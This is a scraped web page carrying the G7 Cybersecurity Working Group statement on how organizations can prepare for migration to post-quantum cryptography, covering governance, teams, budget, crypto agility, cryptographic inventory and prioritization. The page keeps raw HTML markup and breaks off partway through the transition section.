class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </div> </div> </div> </div> </div> </article>
- G7 Cybersecurity Working Group Statement on preparing for a post-quantum cryptography migrationby Canadian Centre for Cyber Security on June 1, 2026 at 2:03 pm
<article data-history-node-id="7764" about="/en/news-events/g7-cybersecurity-working-group-statement-preparing-post-quantum-cryptography-migration" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><p>This document is jointly published by:</p> <ul><li>Canadaās Communications Security Establishment (CSE)</li> <li>Germanyās Federal Office for Information Security (BSI)</li> <li>Italyās National Cybersecurity Agency (ACN)</li> <li>Franceās National Cybersecurity Agency (ANSSI)</li> <li>The US Cybersecurity and Infrastructure Security Agency (CISA)</li> <li>UKās National Cyber Security Centre (NCSC) and Department for Science, Innovation and Technology (DSIT)</li> <li>Japanās National Cybersecurity Office (NCO)</li> </ul><p>in collaboration with the EU Commission.</p> <section><h2 id="Intro">Introduction</h2> <p>Quantum computers use quantum physics to process information and solve problems that are impractical to solve using current computing capabilities. Although these computers can be beneficial in fields like medicine and science, they also pose risks to cyber security with their ability to break public key cryptography (PKC). <abbr title="public key cryptography">PKC</abbr>, also known as asymmetric cryptography, is used to protect the confidentiality, integrity and authentication of communication and data. It also provides assurance that software and updates are from the organizations that you expect and have not been tampered with. The United Statesā National Institute for Standards and Technology (NIST), in conjunction with experts from around the world, has chosen new algorithms that are resistant to a quantum attack in order to replace the existing vulnerable ones. This new field of cryptography is called post-quantum cryptography (PQC). The G7 Cybersecurity Working Group (G7 CWG) recognizes the challenges that transitioning to new algorithms bring to organizations and has developed this publication to provide practical advice to prepare for this important process. In addition to this publication, the G7 Cyber Expert Group (G7 CEG) has published a group statement on ā<a href="https://home.treasury.gov/system/files/136/G7-CEG-Quantum-Roadmap.pdf">Advancing a Coordinated Roadmap for the Transition to Post-Quantum Cryptography in the Financial Sector</a>ā which readers may find useful.</p> </section><section class="alert alert-info"><p>This document is not intended to be a source of cyber security advice, or any other kind of advice, and should not be treated as such. This publication does not supersede any guidance or regulatory requirements published by your national authorities and should not be treated as doing so.</p> </section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#Intro">Introduction</a></li> <li><a href="Audience">Audience and purpose</a></li> <li><a href="#Terminology">Terminology</a></li> <li><a href="#Project-prep">Project preparation</a> <ul><li><a href="#Governance">Governance</a></li> <li><a href="#Project-teams">Project teams</a></li> <li><a href="#Org-aware">Organizational awareness</a></li> <li><a href="#Budget-consider">Budget considerations</a></li> <li><a crypto-agil="" href="#">Cryptographic agility</a></li> </ul></li> <li><a href="#Plan-dev">Migration plan development</a> <ul><li><a href="#Id-crypto">Identifying cryptography</a></li> <li><a href="#Prioritization">Prioritization</a></li> <li><a href="#Transition">Transition</a></li> <li><a href="#Testing">Testing</a></li> <li><a href="#Documentation">Documentation</a></li> </ul></li> <li><a href="#Conclusion">Conclusion</a></li> <li><a href="#Appendix">Appendix</a> <ul><li><a href="consider-crypto-id">Considerations for identifying cryptography</a></li> <li><a href="#hybrid-crypto">Hybrid cryptography</a></li> <li><a href="#Operational-Tech">Operational and cloud technology considerations</a></li> <li><a href="#Cert">Certification</a></li> <li><a href="#info-sec">Information security management standards</a></li> </ul></li> </ul></details><section><h2 id="Audience">Audience and purpose</h2> <p>This publication provides recommendations to prepare organizations to transition to <abbr title="Post-quantum cryptography">PQC</abbr>. It has been developed by dedicated experts of the G7 CWG, including governments and their national cyber agencies. It is targeted at technical management of medium-to-large organizations to provide guidance on the types of work that could be performed during a typical transition project. The G7 CWG recognizes that organizations across the world have different structures and governance requirements, and that a single guidance publication cannot cover all organizationsā needs. As a result, this publication provides pragmatic approaches that can be adopted and modified by organizations to meet their goal of transitioning to <abbr title="Post-quantum cryptography">PQC</abbr>. In addition to this publication, the G7 CWG recommends that you review other relevant guidance from standards bodies as well as your national cyber agency. This publication should not supersede any guidance published by your national technical authority.</p> </section><section><h2 id="Terminology">Terminology</h2> <p>Most of the terminology used in this section comes from the European Commissionās <abbr title="Post-quantum cryptography">PQC</abbr> roadmap publication<sup id="fn1-rf"><a class="fn-lnk" href="#fn1">1</a></sup>. Any modifications or additions in this publication are due to changes in audience or are intended to add information relevant to this publication.</p> <dl><dt>Cryptographic agility (crypto agility)</dt> <dd>The design of cryptographic protocols and systems in a modular way that enables replacing the cryptographic components. This concept must not be confused with a requirement to negotiate the cipher suite during protocol execution.</dd> <dt>Cryptographic inventory</dt> <dd>A structured overview of cryptographic assets.</dd> <dt>Cryptographically relevant quantum computer (CRQC)</dt> <dd>A quantum computer that is powerful enough to solve factorization and discrete logarithm problems of sizes that are used in quantum-vulnerable cryptography today.</dd> <dt>Harvest now, decrypt later (HNDL) attack</dt> <dd>A scenario, where adversaries store encrypted data for decryption once a cryptographically relevant quantum computer emerges. This is a threat when the confidentiality of data needs to be protected for a long time period (for instance governmental data, sensitive personal data, trade or business secrets).</dd> <dt>Post-quantum cryptography (PQC)</dt> <dd>Asymmetric cryptographic algorithms that are developed and designed to be secure against traditional and quantum attacks.</dd> <dt>Post-quantum traditional (PQ/T) hybrid scheme</dt> <dd>A cryptographic scheme that incorporates at least 1 <abbr title="Post-quantum cryptography">PQC</abbr> algorithm and at least 1 traditional algorithm, where each component algorithm has the same cryptographic purpose as each other and as the overall scheme. An example of such scheme is the Internet Engineering Task Forceās (IETF) Request for Comments (RFC) on <a href="https://datatracker.ietf.org/doc/draft-ietf-tls-hybrid-design/16/">Hybrid key exchange in TLS1.3</a>, which provides a construction for combining a traditional key exchange (for example, elliptic curve Diffie-Hellman (ECDH) or finite field Diffie-Hellman (FFDH) key exchange) with post-quantum key encapsulation mechanisms (KEMs) to provide hybrid confidentiality for the Transport Layer Security (TLS) layer.</dd> <dt>Public key infrastructure (PKI)</dt> <dd>A framework for issuing, maintaining, and revoking public key certificates.</dd> <dt>Quantum attack</dt> <dd>Using a cryptographically relevant quantum computer running a quantum algorithm to attack a cryptographic algorithm.</dd> <dt>Quantum-safe</dt> <dd>Something that is expected to be secure against traditional and quantum attacks. This term also covers symmetric cryptography algorithms.</dd> <dt>Quantum-vulnerable</dt> <dd>Not quantum-safe. Cryptographic algorithms that are expected to be vulnerable to quantum attacks.</dd> <dt>Traditional</dt> <dd>Quantum-vulnerable (for cryptographic mechanisms) or non-quantum (for example, for attacks) depending on the context.</dd> </dl></section><section><h2 id="Project-prep">Project preparation</h2> <p>The following sections outline considerations for organizations when preparing to transition to <abbr title="Post-quantum cryptography">PQC</abbr>, including:</p> <ul><li>governance</li> <li>project teams</li> <li>organizational awareness</li> <li>budget</li> <li>crypto agility</li> </ul><p>Although this publication provides information on how to prepare organizations for the transition to <abbr title="Post-quantum cryptography">PQC</abbr>, this is not an exhaustive list, and your organization may have additional requirements that should be considered for your specific situation. In addition to this publication, you should also consult all guidance from your national cyber agency.</p> <div> <h3 id="Governance">Governance</h3> <p>When presenting <abbr title="Post-quantum cryptography">PQC</abbr> to senior leadership, the following points may secure their buy-in and allow them to understand their role during the transition. It is important that senior leadership takes an active role in the promotion of <abbr title="Post-quantum cryptography">PQC</abbr> in their organization. They should provide direction to technical leads on the scale and pace of <abbr title="Post-quantum cryptography">PQC</abbr> migration. In turn, technical teams should provide senior leadership with estimates on the costs and what can be delivered within a given timeframe. They should also provide regular updates to senior leadership on progress against the timeframe.</p> <p>Senior leaders are responsible for setting strategic priorities and allocating resources. It is important to note that <abbr title="Post-quantum cryptography">PQC</abbr> is not just a technical upgrade, but rather a core cyber security measure that should be integrated into existing organizational risk management processes and information security management systems (ISMS).</p> </div> <div> <h3>Timeframes</h3> <p>Unlike some cyber security threats which require rapid changes that can be disruptive and expensive, an advantage of <abbr title="Post-quantum cryptography">PQC</abbr> migration is its relatively long timeframe for implementation. Migration is expected to be completed in the private sector during the 2030s (specific dates will vary slightly by country; refer to your national guidelines for additional information). You should highlight to senior leadership that beginning a controlled migration early on will make migration more manageable and affordable.</p> <h4>Competition and excellence</h4> <p>Starting the <abbr title="Post-quantum cryptography">PQC</abbr> transition ahead of your competitors may signal to investors and customers that your organization is forward-thinking and takes cyber security seriously. To effectively engage senior leadership, you should stress the competitive advantage that early <abbr title="Post-quantum cryptography">PQC</abbr> adoption brings.</p> <h4>How to engage leadership</h4> <ul><li>Frame <abbr title="Post-quantum cryptography">PQC</abbr> as a business risk. For instance, emphasize the HNDL threat and the long-term impact on data confidentiality. You can also highlight that failure to act in a timely and structured manner may be more costly in the long run.</li> <li>Use the available resources from your national technical authority, including guidance relating to promoting cyber security to boards and executives. Highlight any deadlines for <abbr title="Post-quantum cryptography">PQC</abbr> completion.</li> <li>Position <abbr title="Post-quantum cryptography">PQC</abbr> migration as an opportunity for organizations to: <ul><li>modernize infrastructure</li> <li>improve resilience</li> <li>demonstrate their dedication to cyber security by making <abbr title="Post-quantum cryptography">PQC</abbr> a part of their ānormalā cyber security upgrade and refresh cycles</li> </ul></li> </ul><h4>Practical steps</h4> <ul><li>Designate a board member accountable for <abbr title="Post-quantum cryptography">PQC</abbr> migration, including allocation of funding for the work. Where possible, this should be the member accountable for managing the wider cyber security risks of the organization. This individual should also be someone that is known to employees and with whom they can engage.</li> <li>Map cryptographic dependencies: Identify where <abbr title="public key cryptography">PKC</abbr> is used across systems and supply chains.</li> <li>Consider using consultants that specialize in <abbr title="Post-quantum cryptography">PQC</abbr> migration. Some countries have accreditation schemes for consultancies that have received training in this area.</li> <li>Join working groups: Collaborate with industry peers to share best practices and avoid duplication of effort. If these groups do not exist, consider establishing them to demonstrate leadership in your sector.</li> <li>Track progress: Use metrics to measure leadership awareness and decision-making impact.</li> </ul></div> <div> <h3 id="Project-teams">Project teams</h3> <p>To prepare for the transition to <abbr title="Post-quantum cryptography">PQC</abbr>, it is recommended that organizations develop teams to oversee the work. Project teams should consist of stakeholders throughout the organization and include at least 1 member from senior management to lend necessary support. Although much of the work to be performed is technical, it is beneficial to include stakeholders in non-technical areas, including finance, project management, procurement and any other relevant stakeholders.</p> <p>Below are a series of teams that your organization should consider standing up. This is not prescriptive, and you may find it works better to merge or exclude some of these teams based on your organizationās structure and requirements. You may also choose to outsource some of this work to consultants specializing in <abbr title="Post-quantum cryptography">PQC</abbr>. In this case, check if your national technical authority provides formal accreditation to these organizations.</p> <div> <h4>Executive governance and strategy team</h4> <p>This team will be the main driver of <abbr title="Post-quantum cryptography">PQC</abbr> migration within an organization. The purpose of this team is to set direction, secure board-level buy-in, and align with relevant national timelines. It will also be responsible for briefing the board and ensuring that <abbr title="Post-quantum cryptography">PQC</abbr> remains a high priority on the organizationās agenda.</p> <p>Key roles:</p> <ul><li>Chief information security officer (CISO)</li> <li>Policy lead or <abbr title="Post-quantum cryptography">PQC</abbr> program lead</li> <li>Legal/compliance advisor</li> </ul><p><strong>Tip</strong>: Consider setting up a project management office (PMO) team (discussed below) that will support the governance and strategy team in coordinating <abbr title="Post-quantum cryptography">PQC</abbr> migration and the relevant project teams.</p> </div> <div> <h4>Cryptographic discovery and planning team</h4> <p>One of the first objectives your organization will need to deliver is a map of the systems which will need to be made <abbr title="Post-quantum cryptography">PQC</abbr>-compliant. This map should identify both internal systems and anything that is delivered by a third party. Once you have completed this discovery task, you should draft a migration plan.</p> <p>The purpose of this team will be to map cryptographic dependencies, assess risks and develop migration plans.</p> <p>Key roles:</p> <ul><li>Cryptography specialist</li> <li>Systems architect</li> <li>Asset discovery analyst</li> </ul><p><strong>Tip:</strong> Begin with a full discovery exercise to identify where <abbr title="public key cryptography">PKC</abbr> is used across systems, and donāt forget about your suppliers.</p> </div> <div> <h4>Technical implementation team</h4> <p>Once your organization has undertaken a discovery and mapping task, the next objective should be the implementation of <abbr title="Post-quantum cryptography">PQC</abbr> in discovered systems.</p> <p>The purpose of this group is to upgrade systems, integrate <abbr title="Post-quantum cryptography">PQC</abbr> algorithms and validate performance.</p> <p>Key roles:</p> <ul><li>Software engineers</li> <li>Network security engineers</li> <li>Infrastructure/development and operations (DevOps) leads</li> </ul></div> <div> <h4>Vendor and supply chain engagement team</h4> <p>During the discovery and mapping phase, it is likely that you will have identified that third-party systems will also need to be <abbr title="Post-quantum cryptography">PQC</abbr> compliant. It is therefore important to engage with suppliers as early as possible to ensure they can meet your <abbr title="Post-quantum cryptography">PQC</abbr> migration deadlines.</p> <p>The purpose of this group is to ensure that suppliers and other service providers are <abbr title="Post-quantum cryptography">PQC</abbr>-ready.</p> <p>Key roles:</p> <ul><li>Procurement lead</li> <li>Vendor risk manager</li> <li>Supply chain analyst</li> </ul><p><strong>Tip:</strong> If you supply other businesses, it is worth considering their demands for <abbr title="Post-quantum cryptography">PQC</abbr>-compliant services. Early <abbr title="Post-quantum cryptography">PQC</abbr> migration in your business may set you apart from your competitors.</p> </div> <div> <h4>Project management office (PMO)</h4> <p>As with all medium-to-large-scale projects, your organization may wish to consider a PMO team to oversee and coordinate the <abbr title="Post-quantum cryptography">PQC</abbr> migration plan, as well as the outputs and expectations from the other teams listed.</p> <p>The purpose of the PMO will be to oversee timelines, dependencies and reporting updates to the executive.</p> <p>Key roles:</p> <ul><li>Project manager</li> <li>Risk and issue manager</li> <li>Reporting analyst</li> </ul></div> </div> <div> <h3 id="Org-aware">Organizational awareness</h3> <p>As with most large projects, it is important that all affected stakeholders are aware of how <abbr title="Post-quantum cryptography">PQC</abbr> migration will impact them. It should be expected that the transition to <abbr title="Post-quantum cryptography">PQC</abbr> will affect most people in an organization and in varying ways, from the leadership who must oversee the work and provide the financing, to the employees who use the software and devices that will be transitioned.</p> <p>Your communication goals should be to:</p> <ul><li>inform senior leadership of the need to transition to <abbr title="Post-quantum cryptography">PQC</abbr> so that they can make necessary decisions for your organization. Discussion topics include the reason for the transition, estimated timelines, potential costs and other topics relevant to your organization.</li> <li>prepare teams within your organization that will be involved with the transition so that they are aware of their roles and responsibilities. Each team should use this information to develop or modify policies and procedures appropriately. For example, updating procurement policies to require the purchase of products that support <abbr title="Post-quantum cryptography">PQC</abbr>.</li> <li>inform members across the organization about what the transition to <abbr title="Post-quantum cryptography">PQC</abbr> is, why it is important and how it is expected to affect them and their work. This includes training on any new tools and policies that will be introduced during the transition.</li> </ul><p>Communications should continue throughout the project to ensure that all stakeholders are aware of the latest updates and can make relevant decisions.</p> </div> <div> <h3 id="Budget-consider">Budget considerations</h3> <p>When preparing for the transition to <abbr title="Post-quantum cryptography">PQC</abbr>, organizations should create a financial plan. Although some transition costs can be covered through natural lifecycling of infrastructure, additional funding resources may be needed to pay for the work. The following is a list of items that an organization should consider when budgeting. Your organization may require additional financial resources in addition to those listed below.</p> <div> <h4>New hardware</h4> <p>You may find that you need to replace existing hardware if your vendor no longer supports it or has no plans to transition it to <abbr title="Post-quantum cryptography">PQC</abbr>. Additionally, new hardware may be needed to test configurations of existing systems to validate that the changes introduced during the transition will work in your environment. When developing a specific budget for the transition, consider whether hardware can be replaced through natural lifecycle replacement and therefore can be excluded from this specific budget.</p> </div> <h4>Software</h4> <p>Software that uses <abbr title="public key cryptography">PKC</abbr> should be upgraded or replaced to use <abbr title="Post-quantum cryptography">PQC</abbr> algorithms. However, if your software vendor will support <abbr title="Post-quantum cryptography">PQC</abbr> and it is under a support contract, it may not be necessary to budget for replacement. Any changes to software should nonetheless be tested to ensure that it still meets the requirements of your organization.</p> <h4>Support contracts</h4> <p>Maintaining support contracts with vendors may be a good approach to upgrade product firmware and software. However, you should first communicate with your vendors to determine whether they will transition to <abbr title="Post-quantum cryptography">PQC</abbr> and will cover the <abbr title="Post-quantum cryptography">PQC</abbr> algorithms under existing contracts.</p> <h4>Employees and training</h4> <p>It may be necessary to train IT staff on how to use and appropriately configure any new or modified hardware and software to meet organizational requirements and to avoid introducing any vulnerabilities when deploying <abbr title="Post-quantum cryptography">PQC</abbr>. It may also be necessary to inform and educate other staff about new tools or changes to existing tools that may affect their work.</p> <h4>Contractors</h4> <p>For many organizations, transitioning to <abbr title="Post-quantum cryptography">PQC</abbr> may require more resources or cryptographic expertise than the organization has available. Augmenting staff with contractors during the transition may provide the necessary resources to complete the transition while limiting the impact on normal operations.</p> <h4>Outsourcing</h4> <p>Rather than augmenting your staff with contractors, you may wish to outsource the work to organizations that provide <abbr title="Post-quantum cryptography">PQC</abbr> transition expertise. You may wish to check whether your national technical authority provides formal accreditation of these organizations.</p> </div> <div> <h3 id="Crypto-agil">Cryptographic agility</h3> <p>Systems deploying cryptographic mechanisms cannot offer continuous security throughout their lifetimes. This is especially true when you consider the threat posed by state-of-the-art technology that is continuously evolving and becoming more advanced. When the underlying components of a system (or protocols) are rigid, any attempt to transition to a more secure design will always entail significant financial, time and organizational resources, while also making it harder to remain interoperable. For example, it took several decades to transition from the Data Encryption Standard (DES) block cipher to the Advanced Encryption Standard (AES), with <abbr title="National Institute for Standards and Technology">NIST</abbr> finally disallowing the use of the Triple Data Encryption Algorithm (TDEA) as of January 1, 2024.</p> <p>The concept of cryptographic agility is to design protocols and systems in a modular scheme, allowing for the reconfiguration or replacement of individual components. As the migration to <abbr title="Post-quantum cryptography">PQC</abbr> will require a significant overhaul of the current systems in use, there is a long-term security and financial gain to be had by integrating crypto agility into the current transition.</p> <p>The fundamental step to becoming cryptographically agile is the ability to detect weaknesses in deployed systems and to know where changes will need to be made. This leads to the requirement to build and continuously maintain and update a complete cryptographic inventory. This should remain a top priority going forward for all areas where cryptographic mechanisms are used.</p> <p>The way cryptographic agility is implemented and the requirements for achieving it depend on the specific contextāwhether at the vendor or purchaser level, or within a system or protocol. For purchasers, this involves considering crypto agility when buying products and maintaining regular communication with vendors and security experts to remain secure. For a system, this could include an efficient quantum-safe update mechanism for cryptographic components realized in software, firmware or field-programmable gate arrays (FPGAs). For a protocol, a cryptographically agile design should not only facilitate inserting and switching between new algorithms and suites but also incorporate identification methods which would allow for a simple inclusion of new algorithms/suites at a later date. Additionally, for algorithms themselves, such crypto agile designs should allow changes to the parameters which determine the security level provided.</p> <p>Deploying systems and protocols to be cryptographically agile provides various advantages beyond being prepared for the future. Along with offering long-term protection, crypto-agile systems and protocols can be applied in various countries and international organizations. It can also protect confidential information where there may be differing guidelines for parameters and algorithms, ensuring easier compliance for each use-case.</p> <p><a href="https://csrc.nist.gov/pubs/cswp/39/considerations-for-achieving-cryptographic-agility/2pd"><abbr title="National Institute for Standards and Technology">NIST</abbr>ās Cybersecurity White Paper (CSWP) 39</a> and <a href="https://www.cyber.gc.ca/en/guidance/guidance-becoming-cryptographically-agile-itsap40018">Canadian Centre for Cyber Security’s (CCCS) Guidance on becoming cryptographically agile</a> provide more detail on approaches to cryptographic agility.</p> </div> </section><section><h2 id="Plan-dev">Migration plan development</h2> <p>Your organization will most likely develop many plans during the <abbr title="Post-quantum cryptography">PQC</abbr> transition. From high-level plans covering the organization down to specific plans for transitioning individual systems, planning is critical to the success of the <abbr title="Post-quantum cryptography">PQC</abbr> transition. While developing plans, organizations should consider factors such as risk to data, impact on users both internally and externally, interoperability requirements, and service level agreements, as they will all have an effect on how you proceed. This section provides considerations for your organization. As with all subjects described in this publication, you should ensure that all <abbr title="Post-quantum cryptography">PQC</abbr> planning is tailored to your environment.</p> <div> <h3 id="Id-crypto">Identifying cryptography</h3> <p>Building a detailed cryptographic inventory is an important step in an organizationās quantum-readiness plan. This is one of the resource-intensive tasks, as many organizations lack visibility into where and how cryptography is used across systems, devices, network protocols and cloud services.</p> <p>In addition, identification of cryptography should be approached as an ongoing, iterative process, in which each cycle progressively refines the inventory and improves data accuracy. Ideally, this process should be repeated periodically to ensure that the information remains current and reliable.</p> <p>Organizations may start by leveraging existing asset inventory data, obtained as part of standard information security management practices, to identify systems, applications and data flows that depend on cryptographic functions. This will establish a foundation basis for assessing <abbr title="Post-quantum cryptography">PQC</abbr> migration needs and prioritizing remediation efforts.</p> <p>The cryptographic discovery and planning team, which is responsible for the cryptographic inventory, should allocate significant time and resources. Failure to identify a cryptographic asset at this stage may result in an unacceptable cyber security risk when <abbr title="Cryptographically relevant quantum computer">CRQC</abbr>s become available to malicious actors.</p> <p>The collected information should be as detailed as possible (algorithm, key length, usage, etc.), as it will determine whether a cryptographic asset is vulnerable to quantum attack. This will allow the organization to perform an adequate risk evaluation.</p> <p>The cryptographic inventory could be based on standard, machine-readable formats such as the Cryptographic Bill of Materials (CBOM). For more information, read <a href="cryto-inventory-bill">Cryptographic inventory and the <abbr title="Cryptographic Bill of Materials">CBOM</abbr></a> in the Appendix to this publication.</p> <p>While the primary focus of the transition is migrating traditional <abbr title="public key cryptography">PKC</abbr> to <abbr title="Post-quantum cryptography">PQC</abbr>, it is also valuable to identify where cryptography is used across all systems and supply chains (for example, symmetric algorithms, hash functions, etc.) even though it is unlikely to be in scope of <abbr title="Post-quantum cryptography">PQC</abbr> migration to further enhance cryptographic agility within the organization (see Cryptographic agility).</p> <div> <h4>Scenarios where cryptographic assets are used</h4> <p>A complete inventory requires investigating cryptographic assets in several different scenarios that can be grouped into the following 4 areas of research.</p> <div> <h5>Networked appliances and applications</h5> <p>These include systems that use cryptographic algorithms during the transmission of data. For example, TLS uses <abbr title="public key cryptography">PKC</abbr> to establish secure communication tunnels between systems. Networked appliances and applications include but are not limited to:</p> <ul><li>network devices: router, firewalls, virtual private network (VPN) gateways, etc.</li> <li>application servers: web, email, database, etc.</li> <li>messaging applications</li> </ul><p>In this scenario, at least the following widely deployed protocols must be assessed, as they rely on quantum-vulnerable cryptographic primitives (Rivest-Shamir-Adleman (RSA) or Elliptic Curve Digital Signature Algorithm (ECDSA) signatures and Diffie-Hellman and ECDH key exchange):</p> <ul><li>TLS: the backbone of secure web communications. Monitoring TLS traffic provides direct visibility into cipher suites, key lengths and certificate types currently in use.</li> <li>Secure Shell (SSH): critical for administrative access and automation. Assessing the configuration of both SSH servers and clients helps to map which algorithms are actively used for authentication and key negotiation.</li> <li>Authentication and authorization protocols: Open Authorization (OAuth), OpenID Connect (OIDC) and Security Assurance Markup Language (SAML) make use of digital signatures to verify authenticity and integrity of tokens<sup id="fn2-rf"><a class="fn-lnk" href="#fn2"><span class="wb-inv">Footnote </span>2</a></sup> and messages.</li> <li>Internet Protocol Security (IPsec), Internet Key Exchange (IKE): fundamental for VPNs and remote working environments.</li> <li>Email security protocols (S/MIME, PGP): widely used for ensuring confidentiality, authenticity and integrity of email.</li> </ul><p>In addition, particular attention should be paid to Internet-facing network services, as the exposure to the public network significantly increase the risk of an attack by a malicious actor (for example, HNDL attacks). See ā<a href="#Prioritization">Prioritization</a>ā below for more details.</p> </div> <div> <h5>Externally developed software and hardware</h5> <p>These are systems that your organization uses but which are not developed internally. They use cryptography, but not for transmitting data. For example, these may include software that relies primarily on <abbr title="public key cryptography">PKC</abbr>, such as:</p> <ul><li>digital signing and PKI software</li> <li>digital rights management (DRM) software</li> <li>Secure Boot and firmware integrity software</li> </ul><p>It may also include software that extensively uses symmetric cryptography to securely store data and may apply <abbr title="public key cryptography">PKC</abbr> for authentication and authorization, such as:</p> <ul><li>identity and access management (IAM), privileged access management (PAM) and key management systems (KMS)</li> <li>password managers</li> <li>database, file and disk encryption tools</li> </ul><p>Externally developed hardware devices include:</p> <ul><li>hardware security modules (HSMs)</li> <li>smart cards</li> <li>trusted platform modules (TPMs)</li> <li>specialized embedded devices <sup id="fn3-rf"><a class="fn-lnk" href="#fn3"><span class="wb-inv">Footnote </span>3</a></sup></li> </ul><!– footnote 3 –><p>In this case, since the source code of the applications or firmware is not available, identifying cryptographic components requires the cooperation of vendors that may provide a <abbr title="Cryptographic Bill of Materials">CBOM</abbr> or a Software Bill of Materials (SBOM). You can read more about <abbr title="Cryptographic Bill of Materials">CBOM</abbr> and <abbr title="Software Bill of Materials">SBOM</abbr>s in <a href="#cryto-inventory-bill">Cryptographic inventory and the Cryptographic Bill of Materials</a>, found in the Appendix. Alternatively, for legacy systems or when vendor support is not available, we recommend the use of vulnerability scanners and binary inspection utilities.</p> <p>Moreover, some applications could adopt cryptography for network transmissions as well as for other purposes and may need multiple approaches to understand the cryptography implemented.</p> </div> <div> <h5>Internally developed and open-source software</h5> <p>These consist of software that is developed inside your organization or software for which source code is available. This allows you to understand how cryptography is used.</p> <p>For many software projects, integrated development environments (IDE) plugins or source composition analysis (SCA) tools can help to identify the use of cryptographic primitives within the code and to develop a <abbr title="Software Bill of Materials">SBOM</abbr> which will list the components that make up the software. The migration of this software will require internal remediation actions to change configurations, code, application programming interfaces (APIs) or libraries.</p> </div> <div> <h5>Cloud services and externally managed systems</h5> <p>Particular attention must be paid to cloud services, especially within platform-as-a-service (PaaS) and software-as-a-service (SaaS) models, since organizations cannot directly identify or control the cryptography used and must therefore rely on attestations or certifications provided by the service provider. In this context, the cryptographic discovery and planning team should engage with cloud service providers to confirm whether their encryption algorithms and security controls are aligned with <abbr title="Post-quantum cryptography">PQC</abbr> transition strategies, as outlined in <a href="#Operational-Tech">Operational and cloud technology considerations</a>.</p> <p>Moreover, cloud services are often delivered over the public Internet, thus potentially exposing the organizationās data to malicious actors.</p> </div> </div> </div> <div> <h3 id="Prioritization">Prioritization</h3> <p>The complete migration to <abbr title="Post-quantum cryptography">PQC</abbr> will be a enormous effort and it cannot be accomplished in 1 step. Therefore, organizations must apply a method of prioritization to assess which systems are more vulnerable to the rising threats and to identify an order for the migration. The most reasonable way to perform this assessment will be to carry out a quantum risk analysis once an inventory of data assets and cryptographic tools has been produced.</p> <p>Risk assessment is a standard IT infrastructure technique to understand the vulnerabilities of a system and the impact of a potential breach. A quantum risk assessment should follow a similar methodology. In most cases, the functionality provided by the system will have an effect on which threats are relevant and the scope of the threat. Developing a risk assessment is not necessarily a task for one specific team, but rather an ongoing requirement throughout the <abbr title="Post-quantum cryptography">PQC</abbr> migration on which multiple teams may need to work in tandem.</p> <p>The table below provides the main considerations that need to be taken into account for prioritization within a <abbr title="Post-quantum cryptography">PQC</abbr> transition plan but it is not intended as a complete list. This approach is compatible with the approach described in the European Commissionās <a href="https://digital-strategy.ec.europa.eu/en/library/coordinated-implementation-roadmap-transition-post-quantum-cryptography">A Coordinated Implementation Roadmap for the Transition to Post-Quantum Cryptography</a>. An in-depth example of how to build a quantum risk assessment can be found in the Netherlands General Intelligence and Security Serviceās <a href="https://english.aivd.nl/documents/2024/12/3/the-pqc-migration-handbook">The <abbr title="Post-quantum cryptography">PQC</abbr> Migration Handbook</a>.</p> <!– last updated –> <div> <div class="table-responsive"> <table class="table table-bordered"><thead><tr><th scope="col">Factor</th> <th scope="col">Description</th> <th scope="col">Considerations</th> </tr></thead><tbody><tr><th scope="row">Potential damage</th> <td>The damage that could occur if data was unprotected and obtained by an adversary.</td> <td>Data that is of high interest, such as financial, personally identifiable information (PII) and government-mandated records may be considered to be of high priority.</td> </tr><tr><th scope="row">Data lifespan</th> <td>The expected life that the data will be of value and/or should be protected.</td> <td>Data that is susceptible to HNDL attacks could be considered higher priority.</td> </tr><tr><th scope="row">Accessibility of the data</th> <td>Where the data is located that a threat actor could attempt to obtain and decrypt.</td> <td>Data that is exposed to open networks should be considered to have a higher priority than data that is locked securely (for example, offline, in protected zones, or over VPNs or secure websites).</td> </tr><tr><th scope="row">Time to migrate the system</th> <td>How long would it take to complete the migration of a system.</td> <td>The migration time for some cryptographic systems, such as PKIs, will take many years due to their complex structure. Therefore, organizations need to account for the time to migrate a system.</td> </tr></tbody></table></div> </div> <p>Because organizations have to work with restricted resources and potentially depend on external vendors, other factors could affect when specific transitions can take place. These additional factors could include:</p> <ul><li>availability of <abbr title="Post-quantum cryptography">PQC</abbr> products and services</li> <li>service level agreement requirements</li> <li>availability of human and financial resources</li> <li>external integration points (for example, inter-office VPNs, cloud providers)</li> </ul><p>Additionally, it may be beneficial to focus on a simple <abbr title="Post-quantum cryptography">PQC</abbr> upgrade at the beginning of the transition to understand the new cryptographic parameters and develop expertise before attempting larger, more complex upgrades.</p> <p>Once the appropriate factors have been decided upon, organizations will need to determine how to assign a quantum risk assessment. For simplicity, a qualitative scheme with 3 assessment levels such as low, medium and high should be sufficient for organizations to determine the order for the transition. In general, the higher the rating assigned, the higher the priority of migrating to <abbr title="Post-quantum cryptography">PQC</abbr>.</p> <p>The following 2 examples highlight cases where a high quantum risk assessment should be applied:</p> <ul><li>the protection of confidential data that needs to remain undisclosed for a long period of time</li> <li>the protection of software/firmware updates, for which migration could take a significant amount of time to complete</li> </ul><p><strong>Note:</strong> Timeframes for protecting data may differ based on individual nationsā jurisdiction.</p> <p>It is important for organizations to communicate with vendors to understand their plans. We recommend regular communication to ensure that, if their <abbr title="Post-quantum cryptography">PQC</abbr> product roadmaps have changed, you will be able to adjust your plans accordingly. You may discover that your current infrastructure will need to be replaced as either your vendor or the standardized protocols that your services use will not support <abbr title="Post-quantum cryptography">PQC</abbr> in the future. For example, <abbr title="Post-quantum cryptography">PQC</abbr> will only be available in TLS 1.3 and later. If your web services use TLS 1.2 for securing communications, you may have to:</p> <ul><li>upgrade the software</li> <li>upgrade the operating system that runs the software</li> <li>replace the infrastructure the service runs on</li> <li>deal with any combination of the above</li> </ul></div> <div> <h3 id="Transition">Transition</h3> <p>The transition phase is used to implement <abbr title="Post-quantum cryptography">PQC</abbr> on quantum-vulnerable systems. A plan for this phase will need to meet your organizationās requirements and consider items including, but not limited to, timelines, business operations and the priority of the data and systems that the cryptography protects.</p> <p>While developing the transition plan, we recommend that you perform tabletop exercises that will help identify any issues that may prevent a smooth transition to <abbr 